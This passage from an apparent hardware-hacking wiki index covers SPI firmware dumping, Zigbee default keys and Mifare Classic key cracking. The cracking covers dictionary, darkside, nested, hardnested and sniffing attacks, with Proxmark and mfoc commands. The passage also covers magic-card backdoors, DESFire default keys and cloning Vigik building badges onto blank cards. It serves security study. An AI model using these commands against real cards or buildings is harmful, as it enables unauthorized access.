the prior knowledge of the subscribers <code>IMEI</code> (International Equipment Identity) or/and <code>IMSI</code> (International Mobile Subscriber Identity) \u2013 A <code>MSISDN</code> alone may not be sufficient to be able to query this information.</p>"},{"location":"protocols/signaling-system-7/#references","title":"References","text":"<ul> <li>Exposing The Flaw In Our Phone System - Veritasium - 22 sept. 2024</li> <li>SS7 VULNERABILITIES AND ATTACK EXPOSURE REPORT - 2018</li> <li>A Step by Step Guide to SS7 Attacks - Adam Weinberg - April 30, 2023</li> <li>An investigation into SS7 Exploitation Services on the Dark Web - Amir Hadzipasic - November 17, 2021</li> <li>SS7 ATTACK - Ahmet G\u00f6ker - Apr 28, 2022</li> <li>SCTPscan - Finding entry points to SS7 Networks & Telecommunication Backbones - Philippe Langlois - 19 Apr 2007</li> <li>ss7MAPer \u2013 A SS7 pen testing toolkit - Daniel Mende - February 16, 2016</li> </ul>"},{"location":"protocols/spi/","title":"SPI","text":"<p>Serial Peripheral Interface (SPI), is a type of communication protocol used primarily in microcontroller-based systems The controller selects a chip it send and receive information to and from. NOR flash chips with an SPI interface are commonly used as firmware boot chip. SPI has one read and one write line. In QSPI mode, 4 lines are used in parallel.</p> <p>SPI mainly involves four lines or wires:</p> <ul> <li>MOSI (Master Out Slave In): This is the line through which the master sends data to the slave.</li> <li>MISO (Master In Slave Out): Through this line, the slave sends data back to the master.</li> <li>SCLK (Serial Clock): This line is like a clock ticking, controlled by the master. It helps in timing the data transfer, ensuring both master and slave are synchronized.</li> <li>SS (Slave Select)/CS (Chip Select): When the master wants to talk to a particular slave, it uses this line to select the slave.</li> </ul>"},{"location":"protocols/spi/#interact-via-spi","title":"Interact via SPI","text":"<ul> <li>Connect to HydraBus and communicate via the SPI protocol <pre><code>screen /dev/ttyACM0 115200\nspi\n\n# RDID Read Identification Sequence example\n[ 0x9f hd:3 ]\n\n# Read data from the beginning of the chip\n[ 0x03 0x00 0x00 0x00 hd:1024 ]\n</code></pre></li> </ul>"},{"location":"protocols/spi/#dump-firmware-via-spi","title":"Dump Firmware via SPI","text":""},{"location":"protocols/spi/#dump-using-a-raspberry-pi","title":"Dump using a Raspberry Pi","text":"<pre><code>sudo raspi-confi > Interface > SPI(P4)\n# NOTE: might need a press/hold the reset button\n\n# check\nsudo flashrom -p linux spi:dev=/dev/spidev0.0,spispeed=1000\n\n# dump\nsudo flashrom -p linux spi:dev=/dev/spidev0.0,spispeed=1000 -r dump.bin\n</code></pre> <p>An ESP8266 and ESP32 have several SPI busses available in hardware, SPI0 is hooked up to it's own internal flash and is not intended for use, but the HSPI and VSPI busses can be used in combination with a SOIC-8 clamp to read from SPI NOR chips. cheap clips have a tendency to jump off the chips, pomona 5250 has a better grip.</p> <pre><code>$ python ./esptool.py read_flash --spi-connection HSPI 0 0x400000 flash_dump.bin\n</code></pre>"},{"location":"protocols/spi/#dump-with-hydrabus","title":"Dump with HydraBus","text":"<pre><code>flashrom --programmer serprog:dev=/dev/ttyACM0,spispeed=2M -c \"MX25L12833F\" --progress -r /tmp/image.bin\n</code></pre>"},{"location":"protocols/spi/#dump-with-buspirate","title":"Dump with BusPirate","text":"<pre><code>flashrom -p buspirate_spi:dev=/dev/ttyUSB0\nflashrom -p buspirate_spi:dev=/dev/ttyUSB0 -c W25Q64.V\n\nflashrom -p buspirate_spi:dev=/dev/ttyUSB0 -c W25Q64.V -r firmware.bin\n</code></pre>"},{"location":"protocols/spi/#spiffs","title":"SPIFFS","text":"<pre><code>$ cd ~/.arduino15/packages/esp32/tools/esptool/2.3.1\n$ python ./esptool.py -p /dev/ttyUSB0 -b 460800 read_flash 0x300000 0x0fb000 /tmp/spiffs.bin\n\n$ cd ~/.arduino15/packages/esp32/tools/mkspiffs/0.2.3\n$ ./mkspiffs -u /tmp/data -p 256 -b 8192 -s 1028096 /tmp/spiffs/bin\n</code></pre>"},{"location":"protocols/spi/#esp32-diagrams","title":"ESP32 Diagrams","text":"<p>Color coded which pins can be connected from the ESP HSPI pins to an SPI flash. The pink interfaces (DQ1 and DQ2) are optional, they are only used in QSPI mode.</p> <p> </p>"},{"location":"protocols/spi/#references","title":"References","text":"<ul> <li>Hardware Router CTF - Pen Test Partners - 9 mars 2020</li> </ul>"},{"location":"protocols/upnp/","title":"UPnP","text":"<p>TODO</p>"},{"location":"protocols/usb/","title":"USB","text":""},{"location":"protocols/usb/#usb-type-2","title":"USB Type 2","text":""},{"location":"protocols/usb/#usb-type-3","title":"USB Type 3","text":""},{"location":"protocols/usb/#usb-type-c","title":"USB Type C","text":""},{"location":"protocols/usb/#fuzzing","title":"Fuzzing","text":"<ul> <li>HydraBus/HydraUSB3</li> <li>goodfet/Facedancer21 - The purpose of this board is to allow USB devices to be written in host-side Python, so that one workstation can fuzz-test the USB device drivers of another host.</li> <li>USB Studio</li> </ul>"},{"location":"protocols/usb/#references","title":"References","text":"<ul> <li>HydraUSB3 v1.0 Specifications</li> <li>Nullcon Goa 2023 | Cracking With Automated USB Fuzz - Subba Bachina & Conna - 31 dec. 2023</li> <li>Hands On with Chip Off Non-Volatile Memory - Philip DuBois - June 11, 2024</li> </ul>"},{"location":"protocols/zigbee/","title":"ZigBee","text":"<p>Zigbee is a specification for a suite of high-level communication protocols using low-power digital radios. It's designed for use in areas like home automation, medical data collection, industrial control systems, and other applications that require secure and reliable wireless communication. </p> <p>Zigbee is an IEEE 802.15.4-based, wireless networking standard, which is basically used for two-way communication between sensors and control systems. Zigbee is a short-range wireless communication standard like Bluetooth and Wi-Fi while covering a range of 10 to 100 meters.</p>"},{"location":"protocols/zigbee/#tools","title":"Tools","text":"<ul> <li>riverloopsec/killerbee - IEEE 802.15.4/ZigBee Security Research Toolkit</li> <li>APIMote - The ApiMote is a ZigBee security research hardware intended for researchers, students, utility companies, etc. to use for learning about and evaluating the security of IEEE 802.15.4/ZigBee systems as authorized.</li> <li>Cognosec/SecBee (archived) - SecBee is a ZigBee security testing tool developed by Cognosec to test ZigBee implementations for security issues</li> </ul>"},{"location":"protocols/zigbee/#default-trust-center-link-key","title":"Default Trust Center Link Key","text":"<p>Zigbee includes several layers of security, including AES-128 encryption, to ensure that data is transmitted securely across the network.</p> <p>The Zigbee Default Trust Center Link Key is a predefined cryptographic key used in Zigbee networks to secure the initial joining process of a new device to the network. It's part of the security measures implemented within the Zigbee protocol to ensure that only authorized devices can join a particular network.</p> <p>When a new device wants to join a Zigbee network, it must first establish a secure connection with the Trust Center. To do this, the device and the Trust Center use the Default Trust Center Link Key to encrypt their communication.</p> <p>For the profile \"Home Automation\" the default Trust Center Link Key is : <code>ZigBeeAlliance09</code> (<code>\"5A:69:67:42:65:65:41:6C:6C:69:61:6E:63:65:30:39\"</code>).</p> <p>You can use it in Wireshark: Edit > Preferences > Protocols > Zigbee NWK, then \"New\" and write the key in hex format.</p> <p>Example: CVE-2020-28952 - Athom Homey Static and Well-known Keys</p>"},{"location":"protocols/zigbee/#references","title":"References","text":"<ul> <li>AN1233: Zigbee Security - Silabs</li> <li>Zigbee Security 101 (Architecture And Security Issues) - February 11, 2023 - dattatray</li> <li>Tout, tout, tout vous saurez tout sur le ZigBee / MISC n\u00b086 - July 2016 - Kovacs Nicolas</li> <li>ZIGBEE SECURITY: BASICS (PART 2) - Vishruta Rudresh - November 8, 2017</li> <li>ZIGBEE SECURITY: BASICS (PART 3) - Vishruta Rudresh - November 21, 2017</li> <li>Understanding Zigbee and Wireless Mesh Networking - Ray Felch - 27 Aug 2021</li> <li>ZigBee Penetration Testing: Strengthen Your IoT Security - RF Security - 12/08/2022</li> <li>pCTF 2011 #32 That's no bluetooth - STALKR - TUESDAY, APRIL 26, 2011</li> </ul>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/","title":"HF - Mifare Classic","text":""},{"location":"protocols/rfid-nfc/hf-mifare-classic/#hf-mifare-classic-1k","title":"HF - Mifare Classic 1k","text":"<p>New method for Proxmark : <code>hf mf autopwn</code></p>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#dictionary-attack","title":"Dictionary attack","text":"<p>Common keys to try against the card when attempting a dictionnary attack.</p> Key Description FFFFFFFFFFFF Default key 000000000000 Blank key A396EFA4E24F FM11RF08S universal backdoor key A31667A8CEC1 FM11RF08 older backdoor key <p>More keys and dictionnaries can be found at the following links:</p> <ul> <li>RfidResearchGroup/proxmark3/dictionaries</li> <li>ikarus23/MifareClassicTool/std.keys</li> <li>ikarus23/MifareClassicTool/extended-std.keys</li> </ul> <pre><code>hf mf chk *1 ? t # Default keys\nhf mf chk *1 ? d default_keys.dic\nhf mf chk 0 A default_keys.dic # Dictionary attack with file: default_keys.dic\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#darkside-attack-prng-weak","title":"Darkside attack (PRNG Weak)","text":"<p>Proxmark method</p> <pre><code>pm3> hf search\npm3> hf mfu\npm3> hf mf darkside (fork command)\npm3> hf mf mifare (original command)\nParity is all zero. Most likely this card sends NACK on every failed authentication. # Card is empty...\nor\nFound valid key:ffffffffffff # KEY_FOUND\n\npm3> hf mf chk 0 A KEY_FOUND (Check Found Key On Block 0 A)\n</code></pre> <p>ACR122u method</p> <pre><code># start cracking the first key of the first sector. \nmfcuk -C -R 0:A -v 3 -s 250 -S 250\nmfcuk -C -R 3:A -v 3 -s 250 -S 250 -o mycard.mfc\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#nested-attack-prng-weak","title":"Nested attack (PRNG Weak)","text":"<p>Need to find a default key to extract the others</p> <p>Proxmark method</p> <pre><code>hf search\nhf mf chk 1 ? t # \"Test Block Keys\" command which will test the default keys for us\nhf mf nested 1 0 A a0a1a2a3a4a5 t. # \"Nested Attack\" use the key a0a1a2a3a4a5, keeping the key in memory with \"t\"\nhf mf chk * ? # \"Test Block Keys\" command which will test the default keys for us\nhf mf nested 1 0 A ffffffffffff d # \"Nested Attack\" use the key ffffffffffff to extract the others (file:dumpkeys.bin)\nhf mf dump 1 # Dump content\nhf mf restore 1 # Restore content into the card\nhf mf wrbl 5 A 080808080808 32110000cdeeffff3211000005fa05fa # write on block 5, with the key 0808... the content 3211...\nhf mf rdbl 5 A 080808080808 # Read block 5 with the keu 0808..\n\n\npython pm3_mfd2eml.py dumpdata.bin dumpdata.eml\npm3> hf mf cload dumpdata\n</code></pre> <p>ACR122u method</p> <pre><code>nfc-list\nmfoc -O card.mfd # dump the memory of the tag\n# Le param\u00e8tre P permet de sp\u00e9cifier le nombre de sondes par secteur. Par d\u00e9faut, ce nombre est \u00e0 20 mais nous pouvons le passer \u00e0 500.\nmfoc -P 500 -O dump_first_try.dmp\nnfc-mfclassic w a key.mfd data.mfd # write data\nnfc-mfclassic W a key.mfd data.mfd # write data and sector 0\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#hardnested-attack","title":"Hardnested attack","text":"<p>One key is needed in order to use this attack</p> <p>For newest MIFARE Classic and MIFARE Plus SL1</p> <p>Proxmark method</p> <p> NOTE: These hardware changes resulted in the Proxmark 3 Easy being incapable of performing several of the Proxmark's advanced features, including the Mifare Hard-Nested attacks. In other word you need a real Proxmark, not a cheap chinese copy.</p> <pre><code># find a default key\n# res column is either equal to 1 or 0. \n# A 1 in the column means the key was valid for that sector.\nhf mf chk *1 ? t\n\n\n# <block number> <key A|B> <key (12 hex symbols)>\n# <target block number> <target key A|B> [known target key (12 hex symbols)] [w] [s]\n# w: Acquire nonces and write them to binary file nonces.bin\nhf mf hardnested 0 A 8829da9daf76 4 A w\n\n# then https://github.com/aczid/crypto1_bs\n./solve_piwi 0xcafec0de.bin\n./solve_piwi_bs 0xcafec0de.bin\n</code></pre> <p>ACR122u method</p> <p>With the key n\u00b0A a0a1a2a3a4a5 for sector 0 and we want key n\u00b0A for sector 1. This method can be reused for every sectors.</p> <pre><code>./libnfc_crypto1_crack a0a1a2a3a4a5 0 a 4 a\nFound tag with uid 62ef9e5a, collecting nonces for key A of block 4 (sector 1) using known key A a0a1a2a3a4a5 for block 0 (sector 0)\nCollected 2379 nonces... leftover complexity 23833993588 (~2^34.47) - initializing brute-force phase...\nStarting 4 threads to test 23833993588 states using 256-way bitslicing\nCracking... 88.93%\nFound key: c44e2b5e4ce3\nTested 21232975852 states\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#magic-chinese-card-acronyms","title":"Magic Chinese Card - Acronyms","text":"<p>UID - The original Chinese Magic Backdoor card. These cards respond to the backdoor commands and will show Chinese magic backdoor commands (GEN 1a) detected when you do an hf search. These cards can be detected by probing the card to see if it responds to the backdoor commands. Some RFID systems may try to detect these cards.</p> <p>CUID - The 2nd generation Chinese Magic Backdoor card. These cards do not use the backdoor commands, but instead allow Block 0 to be written to like any other block on the card. This gives the card better compatibility to be written to from an Android phone. However, some RFID systems can detect this type of card by sending a write command to Block 0, making the card invalid after the first use is attempted.</p> <p>FUID - This type of card is not as common, but allows Block 0 to be written to just once. This allows you to create a clone of a card and any checks done by the RFID system will pass because Block 0 is no longer writable.</p> <p>UFUID - This type of card is apparently a \"better\" version of the FUID card. Instead of only allowing Block 0 to be written once, you can write to it many times and then lock the block later when you're happy with the result. After locking Block 0, it cannot be unlocked to my knowledge. I do not think there is currently a way to lock these cards using the Proxmark3.</p>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#magic-chinese-card-gen-2","title":"Magic Chinese Card - GEN 2","text":"<p>They can be copied directly. The software allows a new UID.</p>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#magic-chinese-card-gen-1a","title":"Magic Chinese Card - GEN 1a","text":"<p>Works better on the official client.py instead of the iceman fork.</p> <p>Reset a UID Changeable Magic Card (7 bytes UID) You should prefer this method !</p> <pre><code>proxmark3> hf mf csetuid 42917CAB 0004 08\nuid:42 91 7c ab \n--atqa:00 04 sak:08 \nChinese magic backdoor commands (GEN 1a) detected \n</code></pre> <p>To set all the block <code>hf mf csetblk 0 42917CAB00080400022A2C87933EF21D</code></p> <p>NOTE: The UID from several cards can be computed with the displayed id, e.g: ID is 2910621770.</p> <pre><code>import struct\nstruct.pack('<I',2910621770).encode('hex')\n'4a907cad'\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#unbricking-chinese-magic-mifare-classic","title":"Unbricking Chinese Magic Mifare Classic","text":"<p>If you set the wrong BCC for UID and can't read the card anymore, you can use some backdoor commands to change sector 0 using Proxmark:</p> <pre><code>hf 14a raw -a -p -b 7 40\nhf 14a raw -p 43\nhf 14a raw -p -c a0 00\nhf 14a raw -p -c de ad be ef 22 08 04 00 46 59 25 58 49 10 23 02\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#write-and-read-sectors","title":"Write and read sectors","text":"<p>Avoid writing wrbl 3 (contains key A/B + permissions)</p> <pre><code>proxmark3> hf mf wrbl 1 a ffffffffffff 000102030405060708090a0b0c0d0e0f \nproxmark3> hf mf wrbl 2 a ffffffffffff 464c4147313a4d31664072335f303037\n</code></pre> <pre><code>hf mf rdsc <sector number> <key A/B> <key (12 hex symbols)>\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#dump-mifare-card","title":"Dump Mifare card","text":"<pre><code>proxmark3> hf mf dump 1 k hf-mf-A29558E4-key.bin f hf-mf-A29558E4-data.bin\n\n<card memory>: 0 = 320 bytes (Mifare Mini), 1 = 1K (default), 2 = 2K, 4 = 4K\nk <name> : key filename, if no <name> given, UID will be used as filename\nf <name> : data filename, if no <name> given, UID will be used as filename\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#simulate-and-emulate-mifare-card","title":"Simulate and emulate Mifare card","text":"<p>Emulate from a dump file</p> <pre><code># convert .bin to .eml\nproxmark3> script run dumptoemul -i dumpdata.bin\nproxmark3> hf mf eload <file name w/o .eml>\n</code></pre> <p>Simulate Mifare 1K UID</p> <pre><code>proxmark3> hf mf sim u 353c2aa6\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#mitm-attack","title":"MITM attack","text":"<pre><code>hf 14a snoop\n# read card\n# push button\n\nhf list 14a\n089220 | 095108 | Tag | 4d xx xx xx d3 | | UID\n114608 | 125072 | Rdr | 93 70 4d xx xx xx d3 4f 8d | ok | SELECT_UID\n...\n525076 | 529748 | Tag | 61 7a 66 18 | | TAG CHALLENGE\n540608 | 549920 | Rdr |50! 87! 8e ab 3b! 49 5a 1b | !crc| HALT\n551188 | 555860 | Tag |d6! 53! 7c 57! | | TAG RESPONSE\nUID: 4dxxxxxxd3\nTAG CHALLENGE: 617a6618\nREADER CHALLENGE: 50878eab\nREADER RESPONSE: 3b495a1b\nTAG RESPONSE: d6537c57\n\n# crapto1gui or mfkey\ncd tools/mfkey\nmake\n./mfkey64\n./mfkey64 xxxxxxxx 3b45a45a 7ddb6646 142fc1b9 9195fb3f\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#reader-only-attack","title":"Reader only attack","text":"<p>Emulate a MIFARE Classic with a DEADBEEF UID.</p> <pre><code>proxmark3> hf mf sim u deadbeef n 1 x\nmf 1k sim uid: de ad be ef , numreads:0, flags:18 (0x12)\n#db# Collected two pairs of AR/NR which can be used to extract keyA from reader for sector 1:\n#db# ../tools/mfkey/mfkey32 deadbeef 0102xxxx 4d9axxxx 87e7xxxx 06d2xxxx b4a0xxxx\n#db# Emulator stopped. Tracing: 1 trace length: 253\n#db# 4B UID: deadbeef\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#read-a-mifare-dump","title":"Read a Mifare Dump","text":"<pre><code>pip install bitstring\ngit clone https://github.com/zhovner/mfdread\nmfdread.py ./dump.mfd\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#hf-mifare-classic-4k","title":"HF - Mifare Classic 4k","text":""},{"location":"protocols/rfid-nfc/hf-mifare-classic/#chinese-magic-mifare-classic-4k","title":"Chinese Magic Mifare Classic 4K","text":"<p>Block 0 is writable through normal Mifare Classic commands, i.e. there is not special \"unlocked\" read/write like in \"magic Mifare 1k\" version.</p> <p>Writing block 0 with Proxmark, UID <code>01020304</code>, using key A being <code>FFFFFFFFFFFF</code>:</p> <pre><code>hf mf wrbl 0 a FFFFFFFFFFFF 01020304040000000000000000000000\n</code></pre> <p>Again, watch out to have correct BCC and avoid Cascading Tag (0x88) as first byte of UID, or you may make the card unselectable (i.e. brick it).</p>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#references","title":"References","text":"<ul> <li>Mifare HowTo - Qais Patankar - Jan 7, 2018</li> <li>Proxmark3 Mifare Classic 1k Weak / Hard - Guillaume - November 29, 2017</li> <li>Electronique/Hardware/Divers/RFID/Proxmak3/Mf (Mifare) - 12 janvier 2022</li> <li>Proxmark 3, le couteau suisse RFID - Bourdin Pierre - octobre 2017</li> <li>Hacking MIFARE & RFID - phantasmthewhite - Jan 22, 2019</li> <li>Hacking our first MIFARE/RFID Tag - phantasmthewhite - Feb 1, 2019</li> <li>Coffee, NFC, Exploit, Coffee again - ari_ - 14 NOVEMBER 2017</li> <li>ACR122U, mfcuk, and mfoc: Cracking MIFARE Classic on Arch Linux - Linus Karlsson - 2014-08-18</li> <li>Reading NFC cards - Flipper Docs</li> <li>MIFARE Classic: exposing the static encrypted nonce variant - Philippe Teuwen</li> </ul>"},{"location":"protocols/rfid-nfc/hf-mifare-desfire/","title":"HF - Mifare DESFire","text":""},{"location":"protocols/rfid-nfc/hf-mifare-desfire/#desfire-format","title":"DESFire\u00ae Format","text":"<ul> <li>Mifare DESFire MF3ICD40: uses 3DES encryption, product discontinued.</li> <li>Mifare DESFire EV1 : Secure channel that can work with all the keys: DES, two-key 3DES, three-key 3DES and AES. Limited to 28 applications containing a maximum of 32 files per application.</li> <li>Mifare DESFire EV2 : The newest channel that can work with aes key only</li> <li>Mifare DESFire EV3 : Enhanced transaction speed and even better multi-application support.</li> </ul> <p>Each card has a master application with AID <code>0x000000</code> that saves the card's configuration. The memory organization of DESFire supports up to 28 applications on the card and up to 32 files in each application.</p> <ul> <li>Master Application (0x000000)</li> <li>Applications<ul> <li>Files</li> </ul> </li> </ul>"},{"location":"protocols/rfid-nfc/hf-mifare-desfire/#applications","title":"Applications","text":"<pre><code>hf mfdes lsapp --no-auth # show applications list without authentication\nhf mfdes lsapp # show applications list with authentication from default settings\nhf mfdes lsapp --files # show applications list with their files\nhf mfdes getaids --no-auth # this command can return a simple AID list if it is enabled in the card settings\n</code></pre> <p>Each application has an individual set of up to 14 application keys (can be AES-128 or DES keys)</p>"},{"location":"protocols/rfid-nfc/hf-mifare-desfire/#files","title":"Files","text":"<ul> <li>Standard File: used for static data like a employee ID</li> <li>Backup File: like a Standard File but with a \"Commit\" feature that allows for secure storage of data, e.g. a changeable user password</li> <li>Value File: storing changeable value information, e.g. the amount on a canteen payment card</li> <li>Linear Record File: storing a defined number of records, e.g. collecting of goodies</li> <li>Cyclic Record File: like a Linear Record file but this file doesn't get \"full\" but the oldest entry gets overwritten by a new entry, e.g. for a log file</li> </ul> <p>Each file has it\u2019s own Communication Mode:</p> <ul> <li>Plain: all data transfer between the NFC tag and the NFC reader is done in plain</li> <li>MACed: like in Plain mode the communication is is readable but secured by an appended MAC</li> <li>Encrypted: the communication is not visible be anyone, but only who posses the used key is been able to read the data.</li> </ul> <p>Dump files</p> <pre><code>hf mfdes lsfiles --aid 123456 -t aes # file list for application 123456 with aes key\nhf mfdes dump --aid 123456 # shows files and their contents from application 123456\n</code></pre> <p>Read/Write files</p> <p>Read</p> <pre><code>hf mfdes read --aid 123456 --fid 01 # autodetect file type (with hf mfdes getfilesettings) and read its contents\nhf mfdes read --aid 123456 --fid 01 --type record --offset 000000 --length 000001 # read one last record from a record file\n</code></pre> <p>Read via ISO command set</p> <pre><code>hf mfdes read --aid 123456 --fileisoid 1000 --type data -c iso # select application via native command and then read file via ISO\nhf mfdes read --appisoid 0102 --fileisoid 1000 --type data -c iso # select all via ISO commands and then read\nhf mfdes read --appisoid 0102 --fileisoid 1100 --type record -c iso --offset 000005 --length 000001 # read one record (number 5) from file ID 1100 via ISO command set\nhf mfdes read --appisoid 0102 --fileisoid 1100 --type record -c iso --offset 000005 --length 000000 # read all the records (from 5 to 1) from file ID 1100 via ISO command set\n</code></pre> <p>Write</p> <pre><code>hf mfdes write --aid 123456 --fid 01 -d 01020304 # autodetect file type (with hf mfdes getfilesettings) and write data with offset 0\nhf mfdes write --aid 123456 --fid 01 --type data -d 01020304 --commit # write backup data file and commit\nhf mfdes write --aid 123456 --fid 01 --type value -d 00000001 # increment value file\nhf mfdes write --aid 123456 --fid 01 --type value -d 00000001 --debit #\u00a0decrement value file\nhf mfdes write --aid 123456 --fid 01 --type record -d 01020304 # write data to a record file\nhf mfdes write --aid 123456 --fid 01 --type record -d 01020304 --updaterec 0 # update record 0 (latest) in the record file.\n</code></pre> <p>Write via iso command set</p> <pre><code>hf mfdes write --appisoid 1234 --fileisoid 1000 --type data -c iso -d 01020304 # write data to std/backup file via ISO command set\nhf mfdes write --appisoid 1234 --fileisoid 2000 --type record -c iso -d 01020304 # send record to record file via ISO command set\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-desfire/#default-keys","title":"Default Keys","text":"<p>Changing the default keys is a crucial step in the deployment of MIFARE DESFire cards to prevent unauthorized cloning and access.</p> <ul> <li>Default AES key <pre><code>00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n</code></pre></li> <li>Default DES key <pre><code>00 00 00 00 00 00 00 00\n</code></pre></li> </ul> <p>Use a key to get UID</p> <pre><code>hf mfdes getuid # authenticate with default key\nhf mfdes getuid -s d40 # via d40 secure channel\nhf mfdes getuid -s ev2 -t aes -k 11223344556677889900112233445566 # via ev2 secure channel with specified aes key\n</code></pre> <pre><code>hf mfdes detect # simply detect key for master application (PICC level)\nhf mfdes detect --save # detect key and save to defaults. look after to output of hf mfdes default\nhf mfdes detect -s d40 # detect via channel d40\nhf mfdes detect --dict mfdes_default_keys # detect key with help of dictionary file\nhf mfdes detect --aid 123456 -n 2 # detect key 2 from application with AID 123456\n</code></pre> <pre><code>hf mfdes auth -n 0 -t des -k 1122334455667788 --aid 123456 # try application 123456 master key\nhf mfdes auth -n 0 -t aes --save # try PICC AES master key and save the configuration to defaults if authentication succeeds\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-desfire/#uid-check","title":"UID check","text":"<p>The UID of the modifiable MIFARE DESFire\u00ae Compatible UID tags consists of two parts: the UID itself and the BCC. The BCC is a checksum value calculated from the UID. If the BCC is incorrect, the tag will be rejected by the reader.</p> <pre><code>hf 14a raw -s -c 02 00 ab 00 00 00 07 xx xx xx xx xx xx xx xx xx\n</code></pre> <p>For MIFARE DESFire cards, Flipper Zero is able to emulate only the UID.</p> <p>UID rewritable cards: - LAB 401 - MODIFIABLE MIFARE DESFIRE\u00ae COMPATIBLE UID - LAB 401 - MIFARE DESFIRE\u00ae COMPATIBLE MODIFIABLE UID / ATQA / SAK / ATS / APDU</p>"},{"location":"protocols/rfid-nfc/hf-mifare-desfire/#references","title":"References","text":"<ul> <li>Mifare DESFire EV3 \u2014 a beginner tutorial (Android Java) using the DESFire for Android tools - AndroidCrypto - Feb 18, 2024</li> <li>Mifare DESFire EVx NFC tag: Change the Master Application Key from DES to AES (Android/Java) - AndroidCrypto - Jun 19, 2024</li> <li>DESFireChangeMasterAppKey - AndroidCrypto - Jun 19, 2024</li> <li>Notes on MIFARE DESFire - iceman1001 - 2021</li> <li>Mifare DESFire - An Introduction - David Coelho - 19 mai 2019</li> <li>AN-315 - Understanding MIFARE DESFire Credentials - ICT | Protege - 11-May-22</li> <li>MIFARE DESFire gallagher-research - megabug</li> </ul>"},{"location":"protocols/rfid-nfc/hf-mifare-ultralight/","title":"HF - Mifare UltraLight","text":"<ul> <li>Ultralight C (3DES authentication)</li> <li>Ultralight EV1</li> <li>NTAG2</li> </ul>"},{"location":"protocols/rfid-nfc/hf-mifare-ultralight/#chinese-backdoor","title":"Chinese backdoor","text":"<pre><code>pm3 --> hf 14a raw -p -b 7 40\npm3 --> hf 14a raw -p 43\npm3 --> hf 14a raw -p -c a20059982120\n\n0x40, init backdoor mode\n0x41, wipe fills card with 0xFF\n0x42, fills card with 0x00\n0x43, no authentication needed. issue a 0x3000 to read block 0, or write block.\n0x44, fills card with 0x55\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-ultralight/#simulate","title":"Simulate","text":"<pre><code>hf 14a sim 2 <7-byte tag>\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-ultralight/#references","title":"References","text":""},{"location":"protocols/rfid-nfc/hf-vigik/","title":"HF - Vigik","text":"<p>Vigik is essentially a rebranded version of MIFARE Classic because it uses the same underlying technology and standards. </p> <ul> <li>cjbrigato/kigiv-for-proxmark3 - KIGIV stands for Reverse VIGIK, the French Residential and Postal/State services Residential Security system.</li> </ul> <pre><code>modprobe -r pn533_usb\nmodprobe -r pn533\n\nnfc-list # Check the proper functioning of the reader\nmfoc -P 500 -O blank-card.dmp # Extract the encryption keys from the Chinese RFID chip into a file\nmfoc -P 500 -O original-card.dmp # Copy the content of the original RFID chip into a file\nnfc-mfclassic W a original-card.dmp blank-card.dmp # Write the content of the original chip onto the Chinese chip\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-vigik/#residential-service-tokens","title":"Residential & Service Tokens","text":"<p>Usually the key A is <code>0x314b49474956</code> (\"1KIGIV\")</p> <ul> <li>Residential token - can access one given building at any time</li> <li>Service token - (based on Mifare Classic + RSA signature of 768 or 1024 bits) can access all buildings during specific time slots</li> </ul> Provider Service Code Days Hours La Poste Service Universel 0x7aa Mo-Sa 6:00-0:00 La Poste Autre Services 0x7ab Any day 6:00-0:00 France Telecom 0x7ac Any day Any time EDF-GDF 0x7ad Any day Any time"},{"location":"protocols/rfid-nfc/hf-vigik/#public-keys","title":"Public Keys","text":"<pre><code>\"La Poste Service Universel\", 0x07AA, \"AB9953CBFCCD9375B6C028ADBAB7584BED15B9CA037FADED9765996F9EA1AB983F3041C90DA3A198804FF90D5D872A96A4988F91F2243B821E01C5021E3ED4E1BA83B7CFECAB0E766D8563164DE0B2412AE4E6EA63804DF5C19C7AA78DC14F608294D732D7C8C67A88C6F84C0F2E3FAFAE34084349E11AB5953AC68729D07715\"\n\"La Poste Service Universel\", 0x07AA, \"1577D02987C63A95B51AE149430834AEAF3F2E0F4CF8C6887AC6C8D732D79482604FC18DA77A9CC1F54D8063EAE6E42A41B2E04D1663856D760EABECCFB783BAE1D43E1E02C5011E823B24F2918F98A4962A875D0DF94F8098A1A30DC941303F98ABA19E6F996597EDAD7F03CAB915ED4B58B7BAAD28C0B67593CDFCCB5399AB\"\n\"La Poste Autres Services\", 0x07AB, \"A6D99B8D902893B04F3F8DE56CB6BF24338FEE897C1BCE6DFD4EBD05B7B1A07FD2EB564BB4F7D35DBFE0A42966C2C137AD156E3DAB62904592BCA20C0BC7B8B1E261EF82D53F52D203843566305A49A22062DECC38C2FE3864CAD08E79219487651E2F79F1C9392B48CAFE1BFFAFF4802AE451E7A283E55A4026AD1E82DF1A15\"\n\"La Poste Autres Services\", 0x07AB, \"151adf821ead26405ae583a2e751e42a80f4afff1bfeca482b39c9f1792f1e65879421798ed0ca6438fec238ccde6220a2495a3066358403d2523fd582ef61e2b1b8c70b0ca2bc92459062ab3d6e15ad37c1c26629a4e0bf5dd3f7b44b56ebd27fa0b1b705bd4efd6dce1b7c89ee8f3324bfb66ce58d3f4fb09328908d9bd9a6\"\n\"France Telecom\", 0x07AC, 